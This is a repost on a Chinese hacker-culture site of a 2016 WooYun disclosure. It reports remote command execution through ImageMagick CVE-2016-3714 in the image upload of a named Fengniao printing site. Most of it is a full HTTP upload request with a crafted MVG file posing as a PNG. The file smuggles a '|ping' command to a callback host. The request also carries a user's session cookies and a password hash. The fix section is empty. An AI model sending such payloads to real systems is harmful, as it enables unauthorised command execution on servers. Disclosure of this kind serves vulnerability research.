记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

蜂鸟网某站另一处远程命令执行

2016-07-16 18:00

目标:http://yin.fengniao.com/?do=Create/Calendar&type=2#4020

检测发现蜂鸟印制作上传图片处存在CVE-2016-3714 - ImageMagick 命令执行

code 区域
POST http://yin.fengniao.com/?do=Ajax/Calendar&a=fileUpload&productId=2&productionId=4020 HTTP/1.1

Host: yin.fengniao.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0

Accept: application/json, text/javascript, */*; q=0.01

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

X-Requested-With: XMLHttpRequest

Referer: http://yin.fengniao.com/?do=Create/Calendar&type=2

Content-Length: 310

Content-Type: multipart/form-data; boundary=---------------------------12092260437882

Cookie: ip_ck=4M+J5vr3j7QuNzg4MTAwLjE0NjQ3NDU0MTU%3D; lv=1464745417; vn=1; Hm_lvt_916ddc034db3aa7261c5d56a3001e7c5=1464745423; Hm_lpvt_916ddc034db3aa7261c5d56a3001e7c5=1464746474; bbuserid=10297207; bbpassword=3f2646d82d71bf1076da85217a3f7d8c; bbusername=123321aabb; message_str_10297207=0%7C0%7C0%7C38; 9a483e1e1124621acbda816b30abe30f=3u7g7o2k4dv35jg%7B%7BZ%7D%7D%25E4%25B8%258A%25E4%25BC%25A0%25E7%2585%25A7%25E7%2589%2587%7B%7BZ%7D%7Dnull; MyZClick_9a483e1e1124621acbda816b30abe30f=/html/body/div%5B2%5D/div%5B2%5D/div/a/

Connection: keep-alive



-----------------------------12092260437882

Content-Disposition: form-data; name="fileData[]"; filename="3.png"

Content-Type: image/png



push graphic-context

viewbox 0 0 640 480

image copy 200,200 100,100 '|ping fengniao.xxx.xxx'

pop graphic-context

-----------------------------12092260437882--

漏洞证明:

仅以cloudeye为证,具体就不深入了

QQ截图20160601101713.jpg

修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2016-0215007

阅读:119691 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“蜂鸟网某站另一处远程命令执行”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于垒土;黑客之术,始于阅读

推广

工具

标签云